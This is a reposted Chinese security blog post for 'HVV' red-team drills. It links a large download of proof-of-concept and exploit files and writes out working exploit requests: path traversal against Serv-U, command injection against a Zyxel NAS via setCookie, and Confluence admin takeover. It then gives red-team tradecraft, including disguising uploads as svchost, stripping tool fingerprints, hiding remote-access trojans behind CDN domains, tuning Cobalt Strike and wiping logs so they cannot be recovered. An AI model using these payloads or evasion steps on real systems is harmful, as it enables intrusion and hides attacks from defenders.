2024HVV最新POC/EXP,目前有8000+个POC/EXP

admin 2024年6月26日17:03:59评论195 views字数 2842阅读9分28秒阅读模式
点击"仙网攻城狮”关注我们哦~

不当想研发的渗透人不是好运维2024HVV最新POC/EXP,目前有8000+个POC/EXP
让我们每天进步一点点
简介

都是网上收集的POC和EXP,最新收集时间是2024年五月,需要的自取。
表里没有的可以翻翻之前的文章,资源比较零散没有整合起来。

文件链接:

https://pan.baidu.com/s/1OiyRctbpROh5AZO0SJ9kzQ?pwd=6666

其他资源失效了请给我留言

 

实战

CVE-2024-28995 Serv-U

EXPcurl -i -k --path-as-is https://192.168.86.43/?InternalDir=........etc^&InternalFile=passwd文章连接:https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis

CVE-2024-37032 开源AI模型 Ollama 远程代码执行漏洞

POC:http://[victim]:11434/api/pull文章连接:https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032

CVE-2024-29972 – NsaRescueAngel后门账户

POC:ip后面直接添加/cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi CGIGetExtStoInfo None) and False or __import__('subprocess').check_output('id', shell=True)%23信息泄露POST /cmd,/simZysh/register_main/setCookie HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6------WebKitFormBoundaryHHaZAYecVOf5sfa6Content-Disposition: form-data; name="c0"storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#------WebKitFormBoundaryHHaZAYecVOf5sfa6--

CVE-2023-22515-Atlassian Confluence Data Center 权限管理不当

EXPGET /server-info.action?BootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1Host: localhost:8090Accept: */*Accept-Encoding: gzip, deflateConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36X-Atlassian-Token: no-check在进行覆盖 setupComplete=false 之后重新注册管理员POST /setup/setupadministrator.action HTTP/1.1Host:127.0.0.1:8090User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeX-Atlassian-Token: no-checkContent-Length: 122Content-Type: application/x-www-form-urlencodedusername=elk&fullName=elk&[email protected]&password=elk&confirm=elk&setup-next-button=Next

祝各位HVV顺利

工作环境

  • 工作时全部操作均在虚拟机中完成
  • 虚拟机中不登陆个人账号,如QQ、微信、网盘、CSDN等
  • 渗透环境、开发环境、调试环境需要分开,从目标服务器上下载的程序需要在单独的环境中测试运行
  • 渗透虚拟机中全程使用代理IP上网
  • 物理机必须安装安全防护软件,并安装最新补丁,卸载与公司相关的特定软件
  • fofa、cmd5、天眼查等第三方工具平台账号密码不得与公司有关,云协作平台同理
  • RAT使用CDN保护的域名上线
  • 尽量不使用公司网络出口,可以使用移动4G网卡,然后虚拟机再链代理

渗透工具

  • WebShell不能使用普通一句话木马,连接端使用加密流量,建议使用蚁剑
  • 不使用默认冰蝎,需要修改为硬编码密钥
  • 内网渗透时尽量使用socks代理,在本地操作
  • 上传程序到目标服务器时,需要修改文件名:如svchost等,尽量不上传内部自研工具
  • 公开工具需要去除特征指纹,如:sqlmap、masscan、Beacon证书
  • 工具需要设置线程或访问频率,如sqlmap的--delay、内网扫描时线程不大于5
  • Cobalt Strike后⻔上线后,设置time.sleep⼤于500秒
  • 手机短信验证码需使用在线平台如z-sms.com
  • socks代理通道需要使用SSL加密

重点

  • 攻防演习成功的关键是团队协作,要互相帮助学习和进步,不要勾心斗角,每个团队的成功都需要有人当红花有人当绿叶的,外网打点与内网渗透同等重要
  • 渗透过程中,记住上传的webshell、木马等地址,服务器添加的账号,项目结束后要删除或描述在报告中,避免不必要的麻烦
  • 登陆3389不建议添加用户,尝试激活guest,如必须要添加账号,账号名与目标相关即可,避免使用qax、qaxNB等友商关键词
  • 清理日志时需要以文件覆盖的方式删除文件,防止数据恢复,或者仅删除指定ID的日志
  • 碰到蜜罐就不要慌,多喝点花茶,这样嘎了会比较香
      

原文始发于微信公众号(仙网攻城狮):2024HVV最新POC/EXP,目前有8000+个POC/EXP

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月26日17:03:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2024HVV最新POC/EXP,目前有8000+个POC/EXPhttps://cn-sec.com/archives/2887238.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息